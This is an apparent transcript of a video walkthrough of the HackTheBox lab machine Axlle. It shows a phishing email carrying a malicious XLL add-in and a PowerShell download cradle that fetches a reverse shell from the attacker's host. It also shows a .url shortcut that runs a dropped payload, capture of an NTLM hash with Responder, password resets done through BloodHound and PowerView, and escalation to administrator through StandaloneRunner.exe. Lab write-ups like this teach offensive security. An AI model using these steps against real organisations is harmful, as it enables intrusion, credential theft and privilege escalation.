What's going on YouTube? This is Ipsec. I'm doing Axlle from HackTheBox, which the theme of this box is all about phishing and LOLBins. It starts off with creating an XLL document, which is really just a DLL that Excel opens and can lead to code execution even when macros are disabled. It's not really that popular nowadays because Microsoft has disabled this add-in by default, but that is the path onto the box here. You just create that XLL document and then email it to the user. They'll open it, you get a shell on the box. And then from there, if you look around at the config, you discover an email that indicates people are clicking URL files when they're placed in a directory. You may think this is silly, but the technique is more commonly used as a LOLBin to bypass app locker rules. You create a URL shortcut, put the executable in place of where URL goes, and then when it's clicked on, it executes that executable. And then finally, there's another LOLBin with the Windows driver testing tool. I don't really know much about it, so let's just get into the box and see what happens. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it Axlle, then the IP address of 10.10.11.21. This can take some time to run, so I've already ran it. Looking at the results, we have 13 ports open, the first one being SMTP on port 25, and the banner tells us it's hMailServer. And it being on SMTP means that we can send mail. I quickly looked down the list to see if we have any like POP or IMAP or things like that where we could receive mail. I don't see it, so I'm thinking at some point I have to send mail to this box. It is telling me the host name right now of this mail server is mainframe, but let's go on and see what else we see. So we have DNS on port 53, and that's simple DNS plus, so whenever I see that one, I also scan down, confirm yes, that is Windows Active Directory. And it's telling us the domain name of the box is Axlle.htb. So let's go ahead and add the store host file. So do sudo v etc host, and then we can add 10.10.11.21 Axlle.htb, save that. And let's see what else we have. HTTP on port 80, that is IIS. And we also, let's see the title is Axlle Development, and nothing really else sticks out. So let's go on. And this looks like standard like Active Directory things. Nmap is telling us the host name is mainframe. And that's about it, right? So we could confirm the host name is mainframe with like netexec. So we can do netexec smb 10.10.11.21. And while that runs, let's just add mainframe and then mainframe Axlle HTB. And then I always like just testing like regular user accounts to see if we ever get like an anonymous access. So we can do a user that doesn't exist. I don't think I exist on this box. At least I never remembered signing up for this domain. And we get login failure. You could try like guest as well to see if this gets you in. Chances are it won't, just looking for ways to get the server to say authenticated. So at this point, I'm going to move on and check out the web server because I don't think there's really anything else we can do. Maybe we can look at the shares, but I don't think so. Nope. So let's go over and try 10.10.11.21. And I would also try like all the domains, do like virtual host brute force and things like that. But in the interest of time, I'm not going to show it because it doesn't really reveal anything. But whenever you get like domains, I always think of that. So I try like a GoBuster vhost scan on Axlle HTB, see if anything comes up. Looks like our website is down for maintenance. If we have any outstanding invoices, please email them to accounts@axlle.htb in Excel format. Please note all macros have been disabled due to our security posture. And this step becomes relatively tough because the step's going to be creating an XLL file, which is kind of hinted in the machine's name of Axlle with XLL there. This is kind of spelled out. I don't think that's an actual word, but it's kind of hinted at with that. And this used to be a much bigger attack, but Microsoft has disabled this by default, so it's no longer nearly as big. But if you did a lot of Googling around like, let's see, Excel execution without macro, maybe find techniques around this. You'd have to look, search Google. Eventually you find a way to execute macros without a macro. I don't know exactly the correct word. I'm just going to add XSL. Let's see. Here is a good blog post 2 years ago. So macro 4.0 is dead. Long live the XLL. And this was like a add-in format where Excel would just magically execute essentially a DLL. So we'd craft a DLL and then give it the XLL extension, and Excel would just open it, right? And here, if we keep scrolling down, it'll tell us kind of how to create it. So we can see their source code. They just give it this function, the XL auto open, because Excel is going to call this exported function, and they're downloading a payload and then doing run DLL to execute it. So let's see, do they talk more about it? There's probably other good things in this blog post, but once you know the XLL is a way to execute code with Excel, this next part becomes somewhat easy. A lot of people, I think, went through like Visual Studio to install it because that's what a lot of the guides say. But I'm going to show just how doing it from Linux, because doing it from Visual Studio is a bit of a pain because you have to like install plugins. And whenever you use Visual Studio, there's just a lot more configuration than just using GCC. So let's do XSL GitHub payload. Maybe this will show up one. This is a payload generator. I don't think I've ever seen this. I don't want to use that. Let's not use an auto-generating payload. This one's talking about Excel, I think. Let's see. Add-in library. GitHub. Let's do Windows.h. Payload generator. Let's go here. Maybe there is something here. This post is also talking about it. Let's see, Packers containers. Let's see, XLL GitHub payload. Maybe if we do GitHub DLL, because that's essentially what we'll end up making. This looks good. And here's a post that gives a sample C code that we can use. They give Windows instructions, but we can always just compile this on Linux, and it becomes somewhat easy. So let's do vxll.c, paste this in. And then let's see. We probably want to change the winexec method because we don't want to open up Notepad. We want to, let's execute PowerShell. So we'll do PowerShell-enc. And then I'm going to create a web cradle. And the reason why I love doing web cradles is we know if it gets like execution. If we just have PowerShell send a reverse shell right away, we don't know, like maybe like something blocked the reverse shell, maybe antivirus, web, whatever, like the reverse shell is not going to work nearly as much as just a web request. So I like starting with the web request because that confirms we have code execution. So let's do vcradle, and then we want to say IEX new object net.web client download string, then HTTP 10.10.14.8 port 8000. We'll call it rev.ps1. Okay. And now we have to create that rev.ps1. So I'll copy user share the shang, then shells invoke PowerShell TCP one line.ps1. We probably should name that just rev.ps1. And then clean this up a little bit. Change the IP. So we'll do 10.10.14.8 port 9001. Okay, so now we have the PowerShell in place. Or the web cradle, I guess I should say. Start up the web server. And then what we have to do is cat the cradle iconvert-t utf-16 little endian base 64 w0. And this is going to get us a way that PowerShell can decode it, because PowerShell likes utf-16 little endian. That's why you need that format. If you don't have it, then it just won't work. You just one of those things you get used to after doing this for a while. So now when the Excel opens, it's going to execute this PowerShell command. So all this code is doing standard DLL things. There's actually no code here. It's just going to, no matter what, return true. But if Excel calls the XL auto open function, then it's going to perform winexec. So this hopefully will just magically work. So to compile this, they gave kind of instructions, but this is using Windows linker. LD, I think, is specifying a DLL, but we're going to use GCC. So we can do x86, 64, W64 min-GW GCC. If you don't have this, you can probably install it. I think it's probably GCC min-GW or min-GW W64. Search min-GW W64. Yeah, I think this is what I installed to get it, min-GW W64. So we're going to run this, specify the file. Then I'm going to do -shared, so it makes it as a library. And then we'll do -o, and I'm going to call this test.xll. No file windows.h. And that's because libraries normally don't like capital letters on Linux. On Windows, it doesn't matter because NTFS is not a case-sensitive file system. Linux is, so that's why you have to lowercase that. So now we have that file. If I do file test.xll, we can see it is a Windows DLL. So now we want to upload this. So I'm going to use a tool called swax. So we'll do swax. The IP address of the SMTP server is 10.10.11.21. The user is just going to be, we'll do ipsec at Axlle HTTP. And then the target, let's see, what is the email we send it to? Accounts at Axlle.htb. Okay. And then we need to attach a file. So we'll do attach test.xll. So we send this. And then once this gets sent, we probably should do rl wrap nclvmp 9001. So we stand up our listener. It is still sending. So that has been sent. And then I want to monitor this probably for, let's see, 60 seconds to see if they, oh, that was near instantly. So almost immediately we get a hit on rev.ps1 and we have a PowerShell shell. If I do who am I, we can see we are Gideon.haml. So the very first thing I would probably do is try to get this user's hash. So I'm going to open up responder. So let's do sudo responder. I don't think I need a -pi. We can do I ton0. So this will start listening on all interfaces. And then I'm just going to do a GCI 10.10.14.8 share file. It doesn't have to exist. All we want it to do is make that request. So now we have a NTLMv2 hash of this user. I don't think it cracks. I'm not going to bother sending it over to the Kraken. I just wanted to show something I typically would do. So we'd get this. We can kill the server v hashes, and we'll paste this and go on. So the next thing I do, whenever I land on a server that has a website, I always like examining that website because there may be other sites the server hosts. It may also be a case of like database credentials in a config file. I don't know. So let's do a dir. And I do notice app development is a directory. If we go cd app development dir, we can't really list the permissions. Let's come back to that in a minute. So we'll do inetpub. And then let's see, we have www root. And there's nothing here. Just the standard page. If I do type index.html, let's see, AX, this is going to be the website, right? So since it's just a static page, I'm going to kind of ignore it. There was a testing. So if I go into testing, nothing there. I think temp is a standard one. If we look here, there's app pools. I don't think this is anything special. No, there is not. Let's see. Let's go back to www root. Can we echo a file here? So test.html. No, we do not have write access. We can go in other directories to see if we can write files. Can't write there. Assets. There's probably like a command we could do to find writable. I know if we had like access check uploaded to the box, we could, but doesn't look like we can write here. I'll just try one more. Nope, nothing there. So let's go back to the root, and I want to look at this app development directory. Specifically, I want to see like who's the owner of it, because we could go into it but didn't list any files, so maybe we just don't have any permissions. And if we see who owns it, maybe we can target that user, like it gives us an idea. Doing a dir-q doesn't show me anything. Let's see. cmd.exe/c dir/q. Okay, so what's going on there? Let's just do cmd.exe/c dir. You can see the output of dir normally has like this volume and label, serial number, whatever. If I just do dir, it doesn't have that. So what's happening here is PowerShell is seeing dir and then running some like alias, probably like get child items is what it's running instead of dir. So that's why that /q command didn't work, because I'm not actually executing dir.exe. So when I specify cmd.exe/c and it works, I'm actually executing dir.exe. So if you have shell commands that don't really work the way you're thinking about it in PowerShell, chances are you just need to run cmd.exe first to get out of PowerShell. So this shows us the file owners, and we can see we can't query the owner of app development. If we ran a command like icackles, let's see, icackles with this, we can't. We could try like the PowerShell get ACL, and that also fails. If we do get ACL, let's do a directory that we know we can write. Let's do inetpub. We have stuff there, and then I'd probably do like a select star. And let's see, I want to get access to string. So normally my go-to with get ACL is select access to string and then format list. And this tells us who can access the directory, right? So that's normally what I do, but we can't really get into app development. So at this point, I probably would just run Sharphound and look at Bloodhound. It doesn't really give us too much information, so I'm not going to do that right now. It flows better with the video if we did a little bit later. So the next thing I'd be thinking about is we have hMailServer, and if we go into the hmail config, maybe there's a credential there. So that was my next thought. So let's go in program files x86, because that's generally where hMailServer is. I do this progra2, just a shorthand way, because this has spaces and bad characters, it's just easier to type this. And that puts me in the directory. If I did progra1, it would go to program files, the first instance, and go in this one, right? I think this is like Windows short naming convention. I forget exactly what it's called, but that's just a habit I always do. So we look at this, we find hMailServer. So let's go in here, and then let's see, we have, where would the config be? Config, I think, is in bin, as odd as it sounds. Let's see, we have the license, exe, ini. This is the file we want. So if we type this out, we do have potential hashes. I don't think these crack. We have password encryption enabled. This is probably an MD5 sum if I had to guess. Echo-n, wc-c. Yep, 32 characters, probably a MD5 sum. But this is what put me down into this directory, right? The next thing I ran was a tree to show me all the files. And I want to say tree/f shows files. Yes, it does. And if we look, there's something that does stand out, right? And it stood out if we just looked at the directories, but files, it definitely stands out more. A lot of these files are just the default, like this is installation. But if we go in data, we see Axlle HTTP, accounts, attachments, Dallon.Matrix, 2F, and then we have this file, an email. So the database of hMailServer is just flat files, and it looks like we can view them. So we can look at an email from Dallon.Matrix. So let's check that out. So I'm going to go into data. Then let's go into Axlle HTTP. Then Dallon.Matrix. And then I think it was 2F. And we have this email file. So let's do type star.eml. And let's see. We have the email from web devs. So we have a group here. The subject is OS int application testing. And it's going to a bunch of users. So hey everyone, the web dev group is doing some development to figure out the best way to automate the checking and addition of URLs on the OS int portal. we ask you to drop any web shortcuts you have into the c:\inetpub testing folder so we can test automation out, yours in click-worthy URLs. So it looks like we have to drop a web shortcut. So if we Google what is a web shortcut, let's see if this comes up with anything. Win32 app. Let's see. Shortcut. Desktop shortcut to a website. Let's see. Shortcut file. Text-based file formats such as LNK. So it looks like a web shortcut file ends in .url. And does it give the format of it? See, let's check this blog post out. URL in a nutshell. There it is. So we give it the name, like internet shortcut, and then we got URL, and then this. And the URL also supports files. I don't think you can do a file over HTTP, but you could over SMB or on local disk. So I want to create a exe real quick because that's going to be easier than hosting an SMB server to deliver it. So let's go and go back to our payload. So I'm going to cp xll.c to, I'm going to just call it main.c. And then let's see, we can keep this. We don't need that. We can just do, what is it? Int main, like that. And then we can delete all this DLL nonsense. Okay. And then let's do, what was it? x86, 64, w64 min gw gcc, right? Yep, I think this is it. So we'll call it main.c-o. We'll call it shell.exe. And you can also use like MSF Venom or something to generate an executable. Since we already had pretty much the GCC and all the code here, I figured this would be a fun thing to show, right? You just have to create an executable. There's a lot of ways you could do this. So let's move shell.exe to www so we can download it. So let's go cd /program data. And then we can do curl http 10.10.14.8 8000 shell.exe like this. Awesome. And it wants us to drop a shortcut into this folder. So let's do this. So we shortcut. We'll say c:\program data shell.exe. And in PowerShell, this backtick n is new line. It's not \n or how you do it on Linux. To do new lines in PowerShell is backtick and then the special character. So we do set content path. So we can do this. And was it inetpub testing? We'll call this test.url, I guess. And then we give it the value of shortcut. Then let's do our RL wrap, NCLVNP 9001. Create this. dir. Wow, that was instantaneous. I didn't even get to like see if the shortcut was created. If we do a who am I, we are now Dallon.Matrix. So we're a different user now. Over here, we were Gideon Hamil. So let's take a look at exactly what this user can do. So I'm going to run a whoami/all. And the main thing I'm looking for is what groups they're a member of. So we can see they're a member of employees. They're also a member of web devs. And that looks to be it, right? And we could also run Sharphound, but I do want to show a few more things before we do it. I do a dir/q again on this directory. Again, we have to do cmd/c first. And even though we're a member of web dev, we can't go in the app development directory, right? So the next thing, we go into our profile. I think I just do cd with a tilde like that. And then if we look at desktop, let's see, we have user.text. If we ran WinPs, we'd get a password because there is a PowerShell console history, and WinPs does a good job at showing that. instead of just downloading WinPs and running it, I'm going to show a different command that I like doing because it's a bit more versatile, right? If you're in a directory and you think there's sensitive files, you can run a get child item. I shortcut it with GCI, and then we can specify recurse. Force is going to show hidden files. So this is going to go into every directory under Dallon.Matrix. We could also do like -path period if we wanted to specify this path or a different one. But if you don't specify path, your current working directory is used. And then we can do include, and this is going to include files. So I want to include, let's see, star.txt, star.any, star.xml. What's another one? Star.cfg. That should be fine. You can specify what extensions you want. And then what we do is if we hit enter, it'll show all those files, right? But I'm going to then do a select string, and then we can say password. So now we're going to grab all the files that came back and then essentially grep them for the word password. And we can see we get 2 hits back. We have sec password convert to secure string, this, and then PS credential Dallon.Matrix password, right? So we have the user getting the password stored because they had PowerShell console history enabled. And there's a file I'd always like checking. I think it's there by default. But yeah, so I think that's a pretty cool thing. Doesn't really get us anything. It's kind of just, I think, a save point in the box. Maybe this user can WinRM. Can we get on the box as this? Let's see. Let's do evil WinRM -u -I 1010 11 21 -p. We got to go grab that password. If we can't WinRM, I don't actually know what this password does. Maybe it helps to run Bloodhound if you didn't want to just upload Sharphound.exe. It gives you another way to possibly get on the box. But I like just running Sharphound.exe on the box nowadays. You can run Bloodhound.Py, but either works. I guess the last video we did Sharphound, so let's do the Python Ingestor, I guess, this time around. Doesn't look like we can do evil WinRM. So this is just probably another way to execute commands through like netexec. So let's do netexec smb that -u Dallon.Matrix -p like this. Did I get the username right? Let's see. Does this credential work? Yes, it does. So we should be able to run Bloodhound this way. So let's do opt. Let's go Bloodhound.Py. I'm going to run a git branch to make sure I'm on the community edition branch of this. I am. So now let's run this. Let's see. Bloodhound.Py. Forgot all this flags off the top of my head. Let's see. I think it's going to be probably Dallon.Matrix : the password. Let's try this. Dallon.Matrix. Where is that password? There it is. Like that. Let's do mainframe Axlle HTB. Let's see. We got to specify a few flags. DC. Mainframe. DNS TCP. Name server 1010 11 21. Is that going to work? Let's see. We probably have to specify username and password with -u and whatnot. -u. -p like that. And then let's see. OP. I wonder if we just run it like this. There we go. A lot of in-packet scripts like the hostname a different way. Let's see. DNS is timing out. Ping 1010 11 21. Let's see. Let's get rid of DNS TCP. DNS still timed out, and it's doing a SRV request. And let's see, I think that's because we didn't specify the domain. So we'll do -d AXLLE HTB. And there we go. This looks better. I guess we have to do the FQDN, the fully qualified name for that. I bet if we left this DC out, it'll automatically discover that. There we go. It does. Mainframe Axlle HTTP. Before, it was just doing mainframe and then couldn't connect to LDAP because it did not know the rest of this. So there we go. We have it. The Bloodhound dump should be right there. Awesome. So now let's go and start up Bloodhound. So I'm going to go opt Bloodhound, and then we want to go in, let's see, examples, Docker compose, and then it's like, let's see, what is it? Bloodhound port, there we go. So when running Bloodhound, if you specify this environment variable before you run it, it's going to bind Bloodhound on that port. By default, it is 8080, and if you have burp suite up, it's just going to error, and it always sucks because it's not obvious exactly how to change it. So I always got in the habit of always doing this. The other thing is my build is really old. Chances are you don't have a Docker dash compose. You probably have a Docker space compose. But yeah, this will get Bloodhound up and running. And then once it is, we'll be able to go and log in. It does take a little bit to log in. And I'm not sure if I can just upload these JSON files manually, like if I can just specify JSON, or if I have to zip this up first and then upload it. So we'll find out. I don't have a lot of experience with this Bloodhound Community Edition, but we'll see what happens, right? Let's do localhost port 8888. See if it's up yet. It is not. It is still starting up. Refresh. There we go. Spam at example.com. And then my default password was 2024. This should let us log in. Maybe there was an exclamation point at the end of it. Can't remember if I did a exclamation point or not. I'm guessing yes, or maybe Bloodhound wasn't fully running because this login is taking its sweet time. My whole computer's starting to go slow, so I'm guessing Bloodhound is still spinning up. Don't save. I probably should just save my Bloodhound password. Probably bad password there. Hopefully this one logs in. Yep, it does. So now we get logged into Bloodhound. Let's go over to our administration tab so we can go to, whoops, upload files is what I wanted. And then let's specify HTTP, Axlle. Oh no, they're just in opt Bloodhound.Py right now. Go in this directory, specify these JSON files, upload them all, upload to continue. It looks like it does work. All files have been uploaded for ingest. Close, and it is ingesting. So I'm going to pause the video because this does take about a minute, and when it's completed, we will go look at the results. Okay, we are now marked completed. So if I go over to Explore, hopefully we see data. Refresh. Okay, sweet. So let's go and look at our users real quick. If I go back to my shells, we have Dallon.Matrix and Gideon Hamel. So let's look at both of these users. So we can copy this, search on Gideon, and then let's just mark Gideon as owned. And looking at outbound and inbound control, we can't really do that much with Gideon. We could look at what they're a member of. Accounts, authenticated users, domain, whatever. Nothing too interesting. So let's look at the next user. Dallon.Matrix. We can mark Dallon as owned. And there should be an outbound object control. So maybe I did not capture everything with Bloodhound that I wanted to. Shoot. Let's go back. Let's do rm_.json. Or maybe it only did one of these. I probably should have deleted that right away. Let's run this again. We'll do -c all for all collection methods and see if we get anything else. Because I think we should have outbound object control for this user. Let's see, do we get anything web devs? So a member of web dev. Let's see, we can see the other members. Nothing there. Let's go to Cypher queries. And where's shortest path? Shortest path to domain admins. Run this. We don't have anything. Let's see. Do we have more JSON files? We have more JSON files now. We did see all. So I'm guessing the default one didn't collect some things. I forget exactly what it missed. I don't know what file it would be in, but let's just go back and ingest more data. So let's do upload files and upload everything. Upload, upload. Okay. So I'm going to pause the video again and we'll wait till this one's complete. It just really sucks if you run Bloodhound, you don't know what you're supposed to be seeing, and you forget to do the -c all, because you're going to miss a lot of things. I think the reason why it doesn't collect it by default is because, I mean, probably OPSEC reasons, and also on large domains, it can take a while to collect everything, but I always like always collecting as much as possible. So that is still marked as ingesting. It'll probably take another 30 seconds. So I'm going to go ahead and pause the video and let this finish. And now it's marked complete. So let's go look at Explorer to see what we have. If we rerun this query, we have a lot more data, right? So we can see, let's see, anything interesting. Users, domain administrator, key admins. I don't think really anything is interesting from here. If we run it again, do we get anything else? Nope. What is this? Oh, administrator. So let's go back to our users and let's look at Gideon. Make sure there's no outbound control. Oh, Gideon does have outbound. Let's see. Why is it marked on? I'm on web dev still. Gideon. There we go. Only inbound control. There is no outbound. If we look at inbound, we can kind of just see the default things like, oh, administrators can write on this user. So nothing too interesting there. Let's look at Dallon.Matrix. Click here. And look at outbound control. We can see because Dallon.Matrix is a member of Web Devs, we can do ForceChangePassword on Baz Humphreys or Jacob Greeny. And if we click on ForceChangePassword, look at Windows abuse, it tells us how to do it. So we can do the secpassword command to set the password, and then the next one to update it. And this is the same thing that was in the console history. So we could also copy and paste out of there. So let's go back to Dallon.Matrix and do this secpassword command. And the next thing we do is a set domain user password. We can skip this because we're already the user we want to. This whole cred step is if we want to run the password change as a different user, but since we're running it as the user we're logged in as, we can do set domain user password. But this is in PowerView. So let's go to GitHub real quick to get PowerView. So I'll just do GitHub, PowerView, and let's see. I want to say it's this repository. It may be a different repository. PowerShell Mafia. Does this have like a development branch? Let's see. This is the repository I normally use. So we can do a git clone here. So let's just do git clone on PowerSploit. Oh, we wanted the dev branch. Let's go in PowerSploit, git checkout dev, git pull. Does that put us in dev? Okay, we should have the dev branch now, hopefully. Let's go to recon. And then where is PowerView? Oh, right there. PowerView.ps1. Let's put this in dub. Okay. So now we can do IX, new object, net.web client, download string, HTTP 10.10.14.8, port 8000. And where's the casing? Capital P, capital V. PowerView.ps1. Okay. Now this should unlock the set domain user command. So we can do set domain user identity. And the user is Jacob Greeny. And then the account password is sec password. There we go. And let's do netexec smb 10101121 Jacob Greeny password of password 123 exclamation point, I think it was. And we can have a success. So let's check WinRM. That fails. Let's see. What can these users do? Member of execution. Inbound, let's see. Go path finding. Do Jacob Greeny. Let's do the mainframe. Path not found. Baz Humphreys. No path found. I swear when I did this before, I saw like an edge that said one of these users could WinRM. Did something change? So that's still the password. I'm going to try evil WinRM real quick. WinRM -I 10101121 U Jacob Greeny P. We'll put this password in. I don't think this is going to work since crackmap exec said no, but do want to try this. That is shocking to me. I guess my netexec version is probably out of date. I've been wanting to update for a while. I'm just putting this here so you can see the version. But I have to update my whole Parrot OS. Maybe I'll do that next week and then put out a new Ansible script for getting back to where I'm at. I can't update netexec because I don't have the latest version of Python. If I try to update, then it fails. So I'm not sure what's going on, but obviously we can WinRM. I do want to take a step back because I don't like that. Let's see. I'm going to run Sharphound, I think. Because I don't know why Bloodhound isn't showing the WinRM edge. Like, I should be able to see that. So let's go back to where we'd run Sharphound. We ran it from Dallon.Matrix. We did it with the Python, though. Let's see. If I do a git pull, it's up to date. Okay. I should have Sharphound in... What box do we just do? Blazerized? That'll probably be there. So let's grab it out of there. Let's go up to directories. www. cp. htb. Blazerized. www. Sharphound.exe. And then we'll run it. Program data. curl HTTP 10.10.14.8 8000 Sharphound.exe. Sharphound.exe to download it. Sharphound.exe collection all. Okay. Go back to WinRM. This will just give us an easy way to download it. Program data. Then we can download the zip. And we're going to upload. And hopefully I see the edge. Because I'm baffled why I don't see WinRM in Bloodhound. And also that netexec is getting denied. That is doubly odd. So let's do upload files. We can go HTTP. Where's this box name? It is Axlle. Bloodhound.zip. Upload. Okay. So it's going to take about a minute or two to ingest. So I'm going to pause the video and we'll come back when it is complete. Okay. Moment of truth. We have now ingested that data. So I'm going to go to Explore. Let's do search. Baz Humphrey. Execution privilege. I swear that was not there before with just the Python data. Let's check the other one. What is it? Not Baz Humphrey. Jacob. Okay. Execution privilege. Yes, it is there. So I'm not sure exactly what's going on with that Python ingester. I'm guessing it just hasn't been updated, but we can see this definitely does work. So definitely recommend using Sharphound when you can, because that's going to be the more accurate, that's the more supported version of ways to collect data, right? But now that we have that, let's move on. And we are a member of, we're Jacob Greeny. If we do whoami/all, let's see what groups we're a member of. We're a member of app devs. So if we remember that one directory before, the app development, chances are we can access this directory, right? We have to do cmd.exe/c, like that. There we go. We can see a user does own this, the built-in administrators. If I run that get ACL command we did before, let's do get ACL, select star to get that property name. I don't know why that's taking a while. That should be instantaneous. There we go. Access to string. Oh, we can see it here, right? But normally I would do select, whoops, not that. Select access to string, then format list, and we can see app devs can read and execute and synchronize this directory, whatever synchronize means. So let's go into the directory. So we'll do app development, dir. We got kbfiltr, dir here. There is a readme. So let's look at this readme. And let's see. This looks, let's see. I don't know if this is created for the box or not, but this looks like a standard readme. This is probably a note from the box author. I've automated running C:program files, Windows kits 10 testing, standalone testing, internal x64 standalone tester, or StandaloneRunner.exe system to test and debug this driver. So we want to see exactly what this program is. So I'm going to do a dir. Let's do gci-force. Is there like a .git directory? There is not. kbfiltr.sln. Is this a thing? Driver samples. kbfiltr. Readme. So this is a sample driver. This is looking somewhat similar to what we saw. So we want to look at probably public exploits for something, right? And I'm thinking we should look at, where was the note put in? StandaloneRunner.exe. So I'm going to do Google's around this. So let's look at StandaloneRunner.exe. First post. Let's see, is this sending us to a place? Let's go here. Looks like a better way to read it than screenshots. And there we go. StandaloneRunner.exe is a utility included in the Windows driver kit used for testing and debugging drivers on Windows systems. So we know there's a note that is saying it's automatically running it. And this is on a living off the land binary. So there's probably a way for us to drop a file next to this and get command execution. So I'm going to go in this directory real quick. So let's do cd like that. Oh man, that is killing me. Cd star, let's go in like that. There we go. What was the directory after internal? x64. cd x64. Okay. So according to the README, this program is being executed. So let's see. Investigating the source. I think there is some that says there is something at the bottom like a TLDR. If you want to test this directly without reading all the details, jump here. Okay. So we need this to be in a directory. We create a file named reboot.rsf with my tester and true. And then we create a file rsf.rsf inside of my tester/working. And then create a file cmd.txt in the execution directory and fill it with the contents. Okay, so let's try this. We want to create a file like this. Let's see. Create a file and put it in that. I'm going to go in program data to write this. Just because there looks like there's a scheduled task running. And, I was hoping Windows will let me go to previous directory like that. But because there's a scheduled task running, I want to create all my files first. And then I'll copy them over here because I can do that a bit quicker than creating them manually, right? So we need to create a file named reboot.rsf and have this as the contents. So we'll do echo this to, what was it? Reboot.rsf. Then we want to put true. So echo true reboot.rsf. Okay, so if we type that file now, we just have those contents. We need to create a directory mytester, which is this, and then /working. So make dir mytester, make dir mytester working. Okay. Create a file named rsf and put it in that directory. So we'll echo nothing to mytestdir working rsf. Okay. And then create a file named cmd.txt. So we'll do echo program data shell.exe. Let's see if we can just run a PowerShell command real quick. So if I cat my main.c, that's going to get me this whole PowerShell thing. So let's just see if we can put this in command.txt. To command.txt. Okay. That looks good, I believe. So now let's go and get the directory we wanted to copy to, which is here. So we'll copy this. And we can say copy command.txt to that directory. We need to put that in quotes because there's spaces. Copy reboot.rsf to this directory. And then we want to do copy, mytestdir to this. And I'm also going to specify recurse so it copies all the contents. And we should start up a listener. Probably should have done that before. Let's go into this directory now and take a look. So we have reboot.rsf, command.txt. We got mytester. Let's do GCI let's just run tree. So we can do tree/f. dir mytestdir working. It did not either write the file or copy it. Okay, that looks better. All the files got deleted. And we don't have a shell. I'm going to guess it did not run that PowerShell command. Let's do copy program data reboot.rsf. Okay, we have that. Let's do echo /program data shell.exe. We want to put that actually as command.txt. Like that. There we go. Let's see. Did we do everything correct? Reboot RSF. That's there. We have command.txt. That's pointing to our executable. And if we wait about 60 seconds, we should get something. Send this to pane 4. So now we have everything on the same pane. dir. The file still exists. I'm going to do the gutsy thing, kill this so we can quickly split this. Okay. And let's see. It's not cleared. Oh, there we go. We have a hit now. So I guess, who am I? And we're administrator. So there is a scheduled task running that is opening this StandaloneRunner.exe to get the shell, right? So this would let us get the root flag since we were administrator. There's one thing I want to do real quick, and I want to see if we could actually use that PowerShell command. Did we screw something up before? So I'm just waiting for all the files to get cleaned up, and I'm going to do the same thing again. So let's do echo, and I'm going to put my one-liner in. So if we cat XLL.c, let's copy this. Let's see, I'm going to do cmd.exe/c, and we will put this in single quotes, like that. dir, type command.txt. That looks good. I wish there was quotes in it, though. The next thing we need to do is copy that RSF. Program data like that. And then echo nothing to, what is it? My testdir working, RSF. Was it my tester? It is. Tree-f /f. Command reboot RSF. That looks good. So instead of waiting for root to execute this, I'm just going to execute it. So StandaloneRunner.exe. Let's see if we get a shell right away. It's taking a while. It says it takes about a minute, right? On this, it says once you execute, wait 60 seconds, and we should see the pop-up. So hopefully, in the next like 40 seconds, we see either the command come back and nothing happens, or it hits it and gives us a shell. If it gives us a shell, we probably just like weren't listening, or we did something odd where administrator didn't give us a shell. I'm guessing this is not going to work. Maybe command.txt, maybe you can't specify arguments. So maybe that's why our PowerShell command just didn't work. Maybe if we pointed to like a .bat file, it may work. I'm not sure, but executables definitely do seem to work. But yeah, I'm going to pause the video and we'll come back probably in 30 seconds. Okay, it was pretty much as soon as I ended the video, the shell came back and we didn't get anything. So I'm guessing that command.txt doesn't support spaces, and that's what's screwing everything up. So yeah, that's going to be the video. I just want to make sure the old way worked. So let's put command.txt there. And now we need the reboot.rsf. I'm just going to manually do this, c:\program data, reboot rsf, do here, dir, that looks good. Type command.txt, okay. StandaloneRunner.exe. I'm just going to sleep for 2 minutes and we'll see if we get a shell. I just want to double check that everything I did was standard and then actually make sure the administrator user can read the flag, since I did not show that. So that looks good. We have reboot RSF, command.text, RSF. So, okay. I'm going to pause the video and we'll come back probably in a minute or two. Okay, we have the shell again as administrator. So if we go in users, administrator, desktop, we should be able to see root.text. So with that being said, that's going to be the video. Hope you guys enjoyed it. Take care, and I'll see you all next time.